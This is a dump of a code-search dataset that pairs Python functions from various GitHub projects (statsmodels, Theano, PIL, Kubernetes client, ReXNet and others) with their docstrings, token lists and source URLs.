nwo
stringlengths
5
106
sha
stringlengths
40
40
path
stringlengths
4
174
language
stringclasses
1 value
identifier
stringlengths
1
140
parameters
stringlengths
0
87.7k
argument_list
stringclasses
1 value
return_statement
stringlengths
0
426k
docstring
stringlengths
0
64.3k
docstring_summary
stringlengths
0
26.3k
docstring_tokens
list
function
stringlengths
18
4.83M
function_tokens
list
url
stringlengths
83
304
statsmodels/statsmodels
debbe7ea6ba28fe5bdb78f09f8cac694bef98722
statsmodels/tsa/vector_ar/vecm.py
python
JohansenTestResult.trace_stat_crit_vals
(self)
return self._cvt
Critical values (90%, 95%, 99%) of trace statistic
Critical values (90%, 95%, 99%) of trace statistic
[ "Critical", "values", "(", "90%", "95%", "99%", ")", "of", "trace", "statistic" ]
def trace_stat_crit_vals(self): """Critical values (90%, 95%, 99%) of trace statistic""" return self._cvt
[ "def", "trace_stat_crit_vals", "(", "self", ")", ":", "return", "self", ".", "_cvt" ]
https://github.com/statsmodels/statsmodels/blob/debbe7ea6ba28fe5bdb78f09f8cac694bef98722/statsmodels/tsa/vector_ar/vecm.py#L803-L805
mkusner/grammarVAE
ffffe272a8cf1772578dfc92254c55c224cddc02
Theano-master/theano/sandbox/linalg/ops.py
python
tag_solve_triangular
(node)
If a general solve() is applied to the output of a cholesky op, then replace it with a triangular solve.
If a general solve() is applied to the output of a cholesky op, then replace it with a triangular solve.
[ "If", "a", "general", "solve", "()", "is", "applied", "to", "the", "output", "of", "a", "cholesky", "op", "then", "replace", "it", "with", "a", "triangular", "solve", "." ]
def tag_solve_triangular(node): """ If a general solve() is applied to the output of a cholesky op, then replace it with a triangular solve. """ if node.op == solve: if node.op.A_structure == 'general': A, b = node.inputs # result is solution Ax=b if A.owner and isinstance(A.owner.op, type(cholesky)): if A.owner.op.lower: return [Solve('lower_triangular')(A, b)] else: return [Solve('upper_triangular')(A, b)] if (A.owner and isinstance(A.owner.op, DimShuffle) and A.owner.op.new_order == (1, 0)): A_T, = A.owner.inputs if A_T.owner and isinstance(A_T.owner.op, type(cholesky)): if A_T.owner.op.lower: return [Solve('upper_triangular')(A, b)] else: return [Solve('lower_triangular')(A, b)]
[ "def", "tag_solve_triangular", "(", "node", ")", ":", "if", "node", ".", "op", "==", "solve", ":", "if", "node", ".", "op", ".", "A_structure", "==", "'general'", ":", "A", ",", "b", "=", "node", ".", "inputs", "# result is solution Ax=b", "if", "A", ".", "owner", "and", "isinstance", "(", "A", ".", "owner", ".", "op", ",", "type", "(", "cholesky", ")", ")", ":", "if", "A", ".", "owner", ".", "op", ".", "lower", ":", "return", "[", "Solve", "(", "'lower_triangular'", ")", "(", "A", ",", "b", ")", "]", "else", ":", "return", "[", "Solve", "(", "'upper_triangular'", ")", "(", "A", ",", "b", ")", "]", "if", "(", "A", ".", "owner", "and", "isinstance", "(", "A", ".", "owner", ".", "op", ",", "DimShuffle", ")", "and", "A", ".", "owner", ".", "op", ".", "new_order", "==", "(", "1", ",", "0", ")", ")", ":", "A_T", ",", "=", "A", ".", "owner", ".", "inputs", "if", "A_T", ".", "owner", "and", "isinstance", "(", "A_T", ".", "owner", ".", "op", ",", "type", "(", "cholesky", ")", ")", ":", "if", "A_T", ".", "owner", ".", "op", ".", "lower", ":", "return", "[", "Solve", "(", "'upper_triangular'", ")", "(", "A", ",", "b", ")", "]", "else", ":", "return", "[", "Solve", "(", "'lower_triangular'", ")", "(", "A", ",", "b", ")", "]" ]
https://github.com/mkusner/grammarVAE/blob/ffffe272a8cf1772578dfc92254c55c224cddc02/Theano-master/theano/sandbox/linalg/ops.py#L299-L320
IronLanguages/main
a949455434b1fda8c783289e897e78a9a0caabb5
External.LCA_RESTRICTED/Languages/IronPython/27/Lib/difflib.py
python
HtmlDiff.__init__
(self,tabsize=8,wrapcolumn=None,linejunk=None, charjunk=IS_CHARACTER_JUNK)
HtmlDiff instance initializer Arguments: tabsize -- tab stop spacing, defaults to 8. wrapcolumn -- column number where lines are broken and wrapped, defaults to None where lines are not wrapped. linejunk,charjunk -- keyword arguments passed into ndiff() (used to by HtmlDiff() to generate the side by side HTML differences). See ndiff() documentation for argument default values and descriptions.
HtmlDiff instance initializer
[ "HtmlDiff", "instance", "initializer" ]
def __init__(self,tabsize=8,wrapcolumn=None,linejunk=None, charjunk=IS_CHARACTER_JUNK): """HtmlDiff instance initializer Arguments: tabsize -- tab stop spacing, defaults to 8. wrapcolumn -- column number where lines are broken and wrapped, defaults to None where lines are not wrapped. linejunk,charjunk -- keyword arguments passed into ndiff() (used to by HtmlDiff() to generate the side by side HTML differences). See ndiff() documentation for argument default values and descriptions. """ self._tabsize = tabsize self._wrapcolumn = wrapcolumn self._linejunk = linejunk self._charjunk = charjunk
[ "def", "__init__", "(", "self", ",", "tabsize", "=", "8", ",", "wrapcolumn", "=", "None", ",", "linejunk", "=", "None", ",", "charjunk", "=", "IS_CHARACTER_JUNK", ")", ":", "self", ".", "_tabsize", "=", "tabsize", "self", ".", "_wrapcolumn", "=", "wrapcolumn", "self", ".", "_linejunk", "=", "linejunk", "self", ".", "_charjunk", "=", "charjunk" ]
https://github.com/IronLanguages/main/blob/a949455434b1fda8c783289e897e78a9a0caabb5/External.LCA_RESTRICTED/Languages/IronPython/27/Lib/difflib.py#L1692-L1707
Marten4n6/EvilOSX
033a662030e99b3704a1505244ebc1e6e59fba57
bot/loaders/helper.py
python
LoaderABC.get_options
(self, set_options)
The returned dictionary must contain a "loader_name" key which contains the name of this loader. :type :rtype: dict :return: A dictionary containing set configuration options.
The returned dictionary must contain a "loader_name" key which contains the name of this loader.
[ "The", "returned", "dictionary", "must", "contain", "a", "loader_name", "key", "which", "contains", "the", "name", "of", "this", "loader", "." ]
def get_options(self, set_options): """The returned dictionary must contain a "loader_name" key which contains the name of this loader. :type :rtype: dict :return: A dictionary containing set configuration options. """ pass
[ "def", "get_options", "(", "self", ",", "set_options", ")", ":", "pass" ]
https://github.com/Marten4n6/EvilOSX/blob/033a662030e99b3704a1505244ebc1e6e59fba57/bot/loaders/helper.py#L50-L57
microsoft/msticpy
2a401444ee529114004f496f4c0376ff25b5268a
msticpy/sectools/vtlookupv3/vtobject_browser.py
python
_extract_summary
(data: Optional[pd.DataFrame] = None)
return data[["sha256", "meaningful_name", "names", "magic"]].iloc[0].to_dict()
Return summary of item.
Return summary of item.
[ "Return", "summary", "of", "item", "." ]
def _extract_summary(data: Optional[pd.DataFrame] = None) -> Dict[str, str]: """Return summary of item.""" def_dict = {"sha256": "", "meaningful_name": "", "names": "", "magic": ""} if data is None: return def_dict if ( "first_submission_date" not in data.columns or data.iloc[0]["first_submission_date"] == _NOT_FOUND ): def_dict["sha256"] = _NOT_FOUND return def_dict return data[["sha256", "meaningful_name", "names", "magic"]].iloc[0].to_dict()
[ "def", "_extract_summary", "(", "data", ":", "Optional", "[", "pd", ".", "DataFrame", "]", "=", "None", ")", "->", "Dict", "[", "str", ",", "str", "]", ":", "def_dict", "=", "{", "\"sha256\"", ":", "\"\"", ",", "\"meaningful_name\"", ":", "\"\"", ",", "\"names\"", ":", "\"\"", ",", "\"magic\"", ":", "\"\"", "}", "if", "data", "is", "None", ":", "return", "def_dict", "if", "(", "\"first_submission_date\"", "not", "in", "data", ".", "columns", "or", "data", ".", "iloc", "[", "0", "]", "[", "\"first_submission_date\"", "]", "==", "_NOT_FOUND", ")", ":", "def_dict", "[", "\"sha256\"", "]", "=", "_NOT_FOUND", "return", "def_dict", "return", "data", "[", "[", "\"sha256\"", ",", "\"meaningful_name\"", ",", "\"names\"", ",", "\"magic\"", "]", "]", ".", "iloc", "[", "0", "]", ".", "to_dict", "(", ")" ]
https://github.com/microsoft/msticpy/blob/2a401444ee529114004f496f4c0376ff25b5268a/msticpy/sectools/vtlookupv3/vtobject_browser.py#L112-L123
jgagneastro/coffeegrindsize
22661ebd21831dba4cf32bfc6ba59fe3d49f879c
App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/PIL/ImageChops.py
python
logical_and
(image1, image2)
return image1._new(image1.im.chop_and(image2.im))
Logical AND between two images. At least one of the images must have mode "1". .. code-block:: python out = ((image1 and image2) % MAX) :rtype: :py:class:`~PIL.Image.Image`
Logical AND between two images. At least one of the images must have mode "1".
[ "Logical", "AND", "between", "two", "images", ".", "At", "least", "one", "of", "the", "images", "must", "have", "mode", "1", "." ]
def logical_and(image1, image2): """Logical AND between two images. At least one of the images must have mode "1". .. code-block:: python out = ((image1 and image2) % MAX) :rtype: :py:class:`~PIL.Image.Image` """ image1.load() image2.load() return image1._new(image1.im.chop_and(image2.im))
[ "def", "logical_and", "(", "image1", ",", "image2", ")", ":", "image1", ".", "load", "(", ")", "image2", ".", "load", "(", ")", "return", "image1", ".", "_new", "(", "image1", ".", "im", ".", "chop_and", "(", "image2", ".", "im", ")", ")" ]
https://github.com/jgagneastro/coffeegrindsize/blob/22661ebd21831dba4cf32bfc6ba59fe3d49f879c/App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/PIL/ImageChops.py#L210-L223
tobspr/RenderPipeline
d8c38c0406a63298f4801782a8e44e9c1e467acf
toolkit/day_time_editor/main.py
python
DayTimeEditor._update_settings_list
(self)
Updates the list of visible settings
Updates the list of visible settings
[ "Updates", "the", "list", "of", "visible", "settings" ]
def _update_settings_list(self): """ Updates the list of visible settings """ self.settings_tree.clear() self._tree_widgets = [] first_item = None for plugin_id, plugin in iteritems(self._plugin_mgr.instances): daytime_settings = self._plugin_mgr.day_settings[plugin_id] if not daytime_settings: # Skip plugins with empty settings continue plugin_head = QTreeWidgetItem(self.settings_tree) plugin_head.setText(0, plugin.name) plugin_head.setFlags(Qt.ItemIsEnabled) font = QFont() font.setBold(True) if not self._plugin_mgr.is_plugin_enabled(plugin_id): plugin_head.setText(0, plugin.name) plugin_head.setFont(0, font) # Display all settings for setting, setting_handle in iteritems(daytime_settings): setting_item = QTreeWidgetItem(plugin_head) setting_item.setText(0, setting_handle.label) if PYQT_VERSION == 4: setting_item.setTextColor(0, QColor(150, 150, 150)) else: setting_item.setForeground(0, QColor(150, 150, 150)) setting_item.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable) setting_item._setting_id = setting setting_item._setting_handle = setting_handle setting_item._plugin_id = plugin_id setting_item.setToolTip(0, setting_handle.description) setting_item.setToolTip(1, setting_handle.description) self._tree_widgets.append((setting_handle, setting_item)) if not first_item: first_item = setting_item self.settings_tree.expandAll() if first_item: self.settings_tree.setCurrentItem(first_item)
[ "def", "_update_settings_list", "(", "self", ")", ":", "self", ".", "settings_tree", ".", "clear", "(", ")", "self", ".", "_tree_widgets", "=", "[", "]", "first_item", "=", "None", "for", "plugin_id", ",", "plugin", "in", "iteritems", "(", "self", ".", "_plugin_mgr", ".", "instances", ")", ":", "daytime_settings", "=", "self", ".", "_plugin_mgr", ".", "day_settings", "[", "plugin_id", "]", "if", "not", "daytime_settings", ":", "# Skip plugins with empty settings", "continue", "plugin_head", "=", "QTreeWidgetItem", "(", "self", ".", "settings_tree", ")", "plugin_head", ".", "setText", "(", "0", ",", "plugin", ".", "name", ")", "plugin_head", ".", "setFlags", "(", "Qt", ".", "ItemIsEnabled", ")", "font", "=", "QFont", "(", ")", "font", ".", "setBold", "(", "True", ")", "if", "not", "self", ".", "_plugin_mgr", ".", "is_plugin_enabled", "(", "plugin_id", ")", ":", "plugin_head", ".", "setText", "(", "0", ",", "plugin", ".", "name", ")", "plugin_head", ".", "setFont", "(", "0", ",", "font", ")", "# Display all settings", "for", "setting", ",", "setting_handle", "in", "iteritems", "(", "daytime_settings", ")", ":", "setting_item", "=", "QTreeWidgetItem", "(", "plugin_head", ")", "setting_item", ".", "setText", "(", "0", ",", "setting_handle", ".", "label", ")", "if", "PYQT_VERSION", "==", "4", ":", "setting_item", ".", "setTextColor", "(", "0", ",", "QColor", "(", "150", ",", "150", ",", "150", ")", ")", "else", ":", "setting_item", ".", "setForeground", "(", "0", ",", "QColor", "(", "150", ",", "150", ",", "150", ")", ")", "setting_item", ".", "setFlags", "(", "Qt", ".", "ItemIsEnabled", "|", "Qt", ".", "ItemIsSelectable", ")", "setting_item", ".", "_setting_id", "=", "setting", "setting_item", ".", "_setting_handle", "=", "setting_handle", "setting_item", ".", "_plugin_id", "=", "plugin_id", "setting_item", ".", "setToolTip", "(", "0", ",", "setting_handle", ".", "description", ")", "setting_item", ".", "setToolTip", "(", "1", ",", "setting_handle", ".", "description", ")", "self", ".", "_tree_widgets", ".", "append", "(", "(", "setting_handle", ",", "setting_item", ")", ")", "if", "not", "first_item", ":", "first_item", "=", "setting_item", "self", ".", "settings_tree", ".", "expandAll", "(", ")", "if", "first_item", ":", "self", ".", "settings_tree", ".", "setCurrentItem", "(", "first_item", ")" ]
https://github.com/tobspr/RenderPipeline/blob/d8c38c0406a63298f4801782a8e44e9c1e467acf/toolkit/day_time_editor/main.py#L241-L286
mdiazcl/fuzzbunch-debian
2b76c2249ade83a389ae3badb12a1bd09901fd2c
windows/Resources/Python/Core/Lib/distutils/dist.py
python
Distribution._get_toplevel_options
(self)
return self.global_options + [ ('command-packages=', None, 'list of packages that provide distutils commands')]
Return the non-display options recognized at the top level. This includes options that are recognized *only* at the top level as well as options recognized for commands.
Return the non-display options recognized at the top level. This includes options that are recognized *only* at the top level as well as options recognized for commands.
[ "Return", "the", "non", "-", "display", "options", "recognized", "at", "the", "top", "level", ".", "This", "includes", "options", "that", "are", "recognized", "*", "only", "*", "at", "the", "top", "level", "as", "well", "as", "options", "recognized", "for", "commands", "." ]
def _get_toplevel_options(self): """Return the non-display options recognized at the top level. This includes options that are recognized *only* at the top level as well as options recognized for commands. """ return self.global_options + [ ('command-packages=', None, 'list of packages that provide distutils commands')]
[ "def", "_get_toplevel_options", "(", "self", ")", ":", "return", "self", ".", "global_options", "+", "[", "(", "'command-packages='", ",", "None", ",", "'list of packages that provide distutils commands'", ")", "]" ]
https://github.com/mdiazcl/fuzzbunch-debian/blob/2b76c2249ade83a389ae3badb12a1bd09901fd2c/windows/Resources/Python/Core/Lib/distutils/dist.py#L310-L317
kuri65536/python-for-android
26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891
python-modules/twisted/twisted/words/xish/domish.py
python
Element.__str__
(self)
return ""
Retrieve the first CData (content) node
Retrieve the first CData (content) node
[ "Retrieve", "the", "first", "CData", "(", "content", ")", "node" ]
def __str__(self): """ Retrieve the first CData (content) node """ for n in self.children: if isinstance(n, types.StringTypes): return n return ""
[ "def", "__str__", "(", "self", ")", ":", "for", "n", "in", "self", ".", "children", ":", "if", "isinstance", "(", "n", ",", "types", ".", "StringTypes", ")", ":", "return", "n", "return", "\"\"" ]
https://github.com/kuri65536/python-for-android/blob/26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891/python-modules/twisted/twisted/words/xish/domish.py#L434-L439
PacktPublishing/Advanced-Deep-Learning-with-Keras
099980731ba4f4e1a847506adf693247e41ef0cb
chapter13-mi-unsupervised/mine-13.8.1.py
python
SimpleMINE.__init__
(self, args, input_dim=1, hidden_units=16, output_dim=1)
Learn to compute MI using MINE (Algorithm 13.7.1) Arguments: args : User-defined arguments such as off-diagonal elements of covariance matrix, batch size, epochs, etc input_dim (int): Input size dimension hidden_units (int): Number of hidden units of the MINE MLP network output_dim (int): Output size dimension
Learn to compute MI using MINE (Algorithm 13.7.1)
[ "Learn", "to", "compute", "MI", "using", "MINE", "(", "Algorithm", "13", ".", "7", ".", "1", ")" ]
def __init__(self, args, input_dim=1, hidden_units=16, output_dim=1): """Learn to compute MI using MINE (Algorithm 13.7.1) Arguments: args : User-defined arguments such as off-diagonal elements of covariance matrix, batch size, epochs, etc input_dim (int): Input size dimension hidden_units (int): Number of hidden units of the MINE MLP network output_dim (int): Output size dimension """ self.args = args self._model = None self.build_model(input_dim, hidden_units, output_dim)
[ "def", "__init__", "(", "self", ",", "args", ",", "input_dim", "=", "1", ",", "hidden_units", "=", "16", ",", "output_dim", "=", "1", ")", ":", "self", ".", "args", "=", "args", "self", ".", "_model", "=", "None", "self", ".", "build_model", "(", "input_dim", ",", "hidden_units", ",", "output_dim", ")" ]
https://github.com/PacktPublishing/Advanced-Deep-Learning-with-Keras/blob/099980731ba4f4e1a847506adf693247e41ef0cb/chapter13-mi-unsupervised/mine-13.8.1.py#L89-L109
w3h/isf
6faf0a3df185465ec17369c90ccc16e2a03a1870
lib/thirdparty/pyreadline/console/console.py
python
Console.get
(self)
Get next event from queue.
Get next event from queue.
[ "Get", "next", "event", "from", "queue", "." ]
def get(self): '''Get next event from queue.''' inputHookFunc = c_void_p.from_address(self.inputHookPtr).value Cevent = INPUT_RECORD() count = DWORD(0) while 1: if inputHookFunc: call_function(inputHookFunc, ()) status = self.ReadConsoleInputW(self.hin, byref(Cevent), 1, byref(count)) if status and count.value == 1: e = event(self, Cevent) return e
[ "def", "get", "(", "self", ")", ":", "inputHookFunc", "=", "c_void_p", ".", "from_address", "(", "self", ".", "inputHookPtr", ")", ".", "value", "Cevent", "=", "INPUT_RECORD", "(", ")", "count", "=", "DWORD", "(", "0", ")", "while", "1", ":", "if", "inputHookFunc", ":", "call_function", "(", "inputHookFunc", ",", "(", ")", ")", "status", "=", "self", ".", "ReadConsoleInputW", "(", "self", ".", "hin", ",", "byref", "(", "Cevent", ")", ",", "1", ",", "byref", "(", "count", ")", ")", "if", "status", "and", "count", ".", "value", "==", "1", ":", "e", "=", "event", "(", "self", ",", "Cevent", ")", "return", "e" ]
https://github.com/w3h/isf/blob/6faf0a3df185465ec17369c90ccc16e2a03a1870/lib/thirdparty/pyreadline/console/console.py#L506-L519
GoSecure/pyrdp
abd8b8762b6d7fd0e49d4a927b529f892b412743
pyrdp/convert/utils.py
python
extractInetAddressesFromPDUPacket
(packet)
return (InetAddress(x.src, x.sport), InetAddress(x.dst, x.dport))
Returns the src and dst InetAddress (IP, port) from a PDU packet
Returns the src and dst InetAddress (IP, port) from a PDU packet
[ "Returns", "the", "src", "and", "dst", "InetAddress", "(", "IP", "port", ")", "from", "a", "PDU", "packet" ]
def extractInetAddressesFromPDUPacket(packet) -> Tuple[InetAddress, InetAddress]: """Returns the src and dst InetAddress (IP, port) from a PDU packet""" x = ExportedPDU(packet.load) return (InetAddress(x.src, x.sport), InetAddress(x.dst, x.dport))
[ "def", "extractInetAddressesFromPDUPacket", "(", "packet", ")", "->", "Tuple", "[", "InetAddress", ",", "InetAddress", "]", ":", "x", "=", "ExportedPDU", "(", "packet", ".", "load", ")", "return", "(", "InetAddress", "(", "x", ".", "src", ",", "x", ".", "sport", ")", ",", "InetAddress", "(", "x", ".", "dst", ",", "x", ".", "dport", ")", ")" ]
https://github.com/GoSecure/pyrdp/blob/abd8b8762b6d7fd0e49d4a927b529f892b412743/pyrdp/convert/utils.py#L71-L74
aimi-cn/AILearners
5aec29a13fbb145a7a55e41ceedb5b42f5bbb1a0
src/py2.x/ml/jqxxsz/9.RegTrees/demo.py
python
loadDataSet
(fileName)
return dataMat
loadDataSet(解析每一行,并转化为float类型) Desc:该函数读取一个以 tab 键为分隔符的文件,然后将每行的内容保存成一组浮点数 Args: fileName 文件名 Returns: dataMat 每一行的数据集array类型 Raises:
loadDataSet(解析每一行,并转化为float类型) Desc:该函数读取一个以 tab 键为分隔符的文件,然后将每行的内容保存成一组浮点数 Args: fileName 文件名 Returns: dataMat 每一行的数据集array类型 Raises:
[ "loadDataSet", "(", "解析每一行,并转化为float类型", ")", "Desc:该函数读取一个以", "tab", "键为分隔符的文件,然后将每行的内容保存成一组浮点数", "Args", ":", "fileName", "文件名", "Returns", ":", "dataMat", "每一行的数据集array类型", "Raises", ":" ]
def loadDataSet(fileName): """loadDataSet(解析每一行,并转化为float类型) Desc:该函数读取一个以 tab 键为分隔符的文件,然后将每行的内容保存成一组浮点数 Args: fileName 文件名 Returns: dataMat 每一行的数据集array类型 Raises: """ # 假定最后一列是结果值 # assume last column is target value dataMat = [] fr = open(fileName) for line in fr.readlines(): curLine = line.strip().split('\t') # 将所有的元素转化为float类型 # map all elements to float() # map() 函数具体的含义,可见 https://my.oschina.net/zyzzy/blog/115096 fltLine = map(float, curLine) dataMat.append(fltLine) return dataMat
[ "def", "loadDataSet", "(", "fileName", ")", ":", "# 假定最后一列是结果值", "# assume last column is target value", "dataMat", "=", "[", "]", "fr", "=", "open", "(", "fileName", ")", "for", "line", "in", "fr", ".", "readlines", "(", ")", ":", "curLine", "=", "line", ".", "strip", "(", ")", ".", "split", "(", "'\\t'", ")", "# 将所有的元素转化为float类型", "# map all elements to float()", "# map() 函数具体的含义,可见 https://my.oschina.net/zyzzy/blog/115096", "fltLine", "=", "map", "(", "float", ",", "curLine", ")", "dataMat", ".", "append", "(", "fltLine", ")", "return", "dataMat" ]
https://github.com/aimi-cn/AILearners/blob/5aec29a13fbb145a7a55e41ceedb5b42f5bbb1a0/src/py2.x/ml/jqxxsz/9.RegTrees/demo.py#L22-L42
pypa/pipenv
b21baade71a86ab3ee1429f71fbc14d4f95fb75d
pipenv/patched/notpip/_internal/utils/misc.py
python
hide_value
(value)
return HiddenText(value, redacted="****")
[]
def hide_value(value): # type: (str) -> HiddenText return HiddenText(value, redacted="****")
[ "def", "hide_value", "(", "value", ")", ":", "# type: (str) -> HiddenText", "return", "HiddenText", "(", "value", ",", "redacted", "=", "\"****\"", ")" ]
https://github.com/pypa/pipenv/blob/b21baade71a86ab3ee1429f71fbc14d4f95fb75d/pipenv/patched/notpip/_internal/utils/misc.py#L734-L736
GiulioRossetti/ndlib
f5817eec0c8e7e86fb03aafe7be208fd4a0e0f6e
ndlib/models/dynamic/DynSIModel.py
python
DynSIModel.__init__
(self, graph, seed=None)
Model Constructor :param graph: A dynetx graph object
Model Constructor
[ "Model", "Constructor" ]
def __init__(self, graph, seed=None): """ Model Constructor :param graph: A dynetx graph object """ super(self.__class__, self).__init__(graph, seed) self.available_statuses = { "Susceptible": 0, "Infected": 1 } self.parameters = { "model": { "beta": { "descr": "Infection rate", "range": "[0,1]", "optional": False} }, "nodes": {}, "edges": {}, } self.name = "SI"
[ "def", "__init__", "(", "self", ",", "graph", ",", "seed", "=", "None", ")", ":", "super", "(", "self", ".", "__class__", ",", "self", ")", ".", "__init__", "(", "graph", ",", "seed", ")", "self", ".", "available_statuses", "=", "{", "\"Susceptible\"", ":", "0", ",", "\"Infected\"", ":", "1", "}", "self", ".", "parameters", "=", "{", "\"model\"", ":", "{", "\"beta\"", ":", "{", "\"descr\"", ":", "\"Infection rate\"", ",", "\"range\"", ":", "\"[0,1]\"", ",", "\"optional\"", ":", "False", "}", "}", ",", "\"nodes\"", ":", "{", "}", ",", "\"edges\"", ":", "{", "}", ",", "}", "self", ".", "name", "=", "\"SI\"" ]
https://github.com/GiulioRossetti/ndlib/blob/f5817eec0c8e7e86fb03aafe7be208fd4a0e0f6e/ndlib/models/dynamic/DynSIModel.py#L18-L41
rwightman/pytorch-image-models
ccfeb06936549f19c453b7f1f27e8e632cfbe1c2
timm/models/rexnet.py
python
rexnet_100
(pretrained=False, **kwargs)
return _create_rexnet('rexnet_100', pretrained, **kwargs)
ReXNet V1 1.0x
ReXNet V1 1.0x
[ "ReXNet", "V1", "1", ".", "0x" ]
def rexnet_100(pretrained=False, **kwargs): """ReXNet V1 1.0x""" return _create_rexnet('rexnet_100', pretrained, **kwargs)
[ "def", "rexnet_100", "(", "pretrained", "=", "False", ",", "*", "*", "kwargs", ")", ":", "return", "_create_rexnet", "(", "'rexnet_100'", ",", "pretrained", ",", "*", "*", "kwargs", ")" ]
https://github.com/rwightman/pytorch-image-models/blob/ccfeb06936549f19c453b7f1f27e8e632cfbe1c2/timm/models/rexnet.py#L195-L197
kubernetes-client/python
47b9da9de2d02b2b7a34fbe05afb44afd130d73a
kubernetes/client/models/v1_volume.py
python
V1Volume.azure_disk
(self, azure_disk)
Sets the azure_disk of this V1Volume. :param azure_disk: The azure_disk of this V1Volume. # noqa: E501 :type: V1AzureDiskVolumeSource
Sets the azure_disk of this V1Volume.
[ "Sets", "the", "azure_disk", "of", "this", "V1Volume", "." ]
def azure_disk(self, azure_disk): """Sets the azure_disk of this V1Volume. :param azure_disk: The azure_disk of this V1Volume. # noqa: E501 :type: V1AzureDiskVolumeSource """ self._azure_disk = azure_disk
[ "def", "azure_disk", "(", "self", ",", "azure_disk", ")", ":", "self", ".", "_azure_disk", "=", "azure_disk" ]
https://github.com/kubernetes-client/python/blob/47b9da9de2d02b2b7a34fbe05afb44afd130d73a/kubernetes/client/models/v1_volume.py#L231-L239
oracle/graalpython
577e02da9755d916056184ec441c26e00b70145c
graalpython/lib-python/3/tkinter/__init__.py
python
Wm.wm_iconposition
(self, x=None, y=None)
return self._getints(self.tk.call( 'wm', 'iconposition', self._w, x, y))
Set the position of the icon of this widget to X and Y. Return a tuple of the current values of X and X if None is given.
Set the position of the icon of this widget to X and Y. Return a tuple of the current values of X and X if None is given.
[ "Set", "the", "position", "of", "the", "icon", "of", "this", "widget", "to", "X", "and", "Y", ".", "Return", "a", "tuple", "of", "the", "current", "values", "of", "X", "and", "X", "if", "None", "is", "given", "." ]
def wm_iconposition(self, x=None, y=None): """Set the position of the icon of this widget to X and Y. Return a tuple of the current values of X and X if None is given.""" return self._getints(self.tk.call( 'wm', 'iconposition', self._w, x, y))
[ "def", "wm_iconposition", "(", "self", ",", "x", "=", "None", ",", "y", "=", "None", ")", ":", "return", "self", ".", "_getints", "(", "self", ".", "tk", ".", "call", "(", "'wm'", ",", "'iconposition'", ",", "self", ".", "_w", ",", "x", ",", "y", ")", ")" ]
https://github.com/oracle/graalpython/blob/577e02da9755d916056184ec441c26e00b70145c/graalpython/lib-python/3/tkinter/__init__.py#L2122-L2126
evhub/coconut
27a4af9dc06667870f736f20c862930001b8cbb2
coconut/icoconut/root.py
python
memoized_parse_block
(code)
Memoized version of parse_block.
Memoized version of parse_block.
[ "Memoized", "version", "of", "parse_block", "." ]
def memoized_parse_block(code): """Memoized version of parse_block.""" internal_assert(lambda: code not in parse_block_memo.values(), "attempted recompilation of", code) success, result = parse_block_memo.get(code, (None, None)) if success is None: try: parsed = COMPILER.parse_block(code) except Exception as err: success, result = False, err else: success, result = True, parsed parse_block_memo[code] = (success, result) if success: return result else: raise result
[ "def", "memoized_parse_block", "(", "code", ")", ":", "internal_assert", "(", "lambda", ":", "code", "not", "in", "parse_block_memo", ".", "values", "(", ")", ",", "\"attempted recompilation of\"", ",", "code", ")", "success", ",", "result", "=", "parse_block_memo", ".", "get", "(", "code", ",", "(", "None", ",", "None", ")", ")", "if", "success", "is", "None", ":", "try", ":", "parsed", "=", "COMPILER", ".", "parse_block", "(", "code", ")", "except", "Exception", "as", "err", ":", "success", ",", "result", "=", "False", ",", "err", "else", ":", "success", ",", "result", "=", "True", ",", "parsed", "parse_block_memo", "[", "code", "]", "=", "(", "success", ",", "result", ")", "if", "success", ":", "return", "result", "else", ":", "raise", "result" ]
https://github.com/evhub/coconut/blob/27a4af9dc06667870f736f20c862930001b8cbb2/coconut/icoconut/root.py#L94-L109
hyperspy/hyperspy
1ffb3fab33e607045a37f30c1463350b72617e10
hyperspy/misc/eds/utils.py
python
electron_range
(element, beam_energy, density='auto', tilt=0)
return (0.0276 * A / np.power(Z, 0.89) / density * np.power(beam_energy, 1.67) * math.cos(math.radians(tilt)))
Returns the maximum electron range for a pure bulk material according to the Kanaya-Okayama parameterziation. Parameters ---------- element: str The element symbol, e.g. 'Al'. beam_energy: float The energy of the beam in keV. density: {float, 'auto'} The density of the material in g/cm3. If 'auto', the density of the pure element is used. tilt: float. The tilt of the sample in degrees. Returns ------- Electron range in micrometers. Examples -------- >>> # Electron range in pure Copper at 30 kV in micron >>> hs.eds.electron_range('Cu', 30.) 2.8766744984001607 Notes ----- From Kanaya, K. and S. Okayama (1972). J. Phys. D. Appl. Phys. 5, p43 See also the textbook of Goldstein et al., Plenum publisher, third edition p 72.
Returns the maximum electron range for a pure bulk material according to the Kanaya-Okayama parameterziation.
[ "Returns", "the", "maximum", "electron", "range", "for", "a", "pure", "bulk", "material", "according", "to", "the", "Kanaya", "-", "Okayama", "parameterziation", "." ]
def electron_range(element, beam_energy, density='auto', tilt=0): """Returns the maximum electron range for a pure bulk material according to the Kanaya-Okayama parameterziation. Parameters ---------- element: str The element symbol, e.g. 'Al'. beam_energy: float The energy of the beam in keV. density: {float, 'auto'} The density of the material in g/cm3. If 'auto', the density of the pure element is used. tilt: float. The tilt of the sample in degrees. Returns ------- Electron range in micrometers. Examples -------- >>> # Electron range in pure Copper at 30 kV in micron >>> hs.eds.electron_range('Cu', 30.) 2.8766744984001607 Notes ----- From Kanaya, K. and S. Okayama (1972). J. Phys. D. Appl. Phys. 5, p43 See also the textbook of Goldstein et al., Plenum publisher, third edition p 72. """ if density == 'auto': density = elements_db[ element]['Physical_properties']['density (g/cm^3)'] Z = elements_db[element]['General_properties']['Z'] A = elements_db[element]['General_properties']['atomic_weight'] # Note: magic numbers here are from Kanaya-Okayama parameterization. See # docstring for associated references. return (0.0276 * A / np.power(Z, 0.89) / density * np.power(beam_energy, 1.67) * math.cos(math.radians(tilt)))
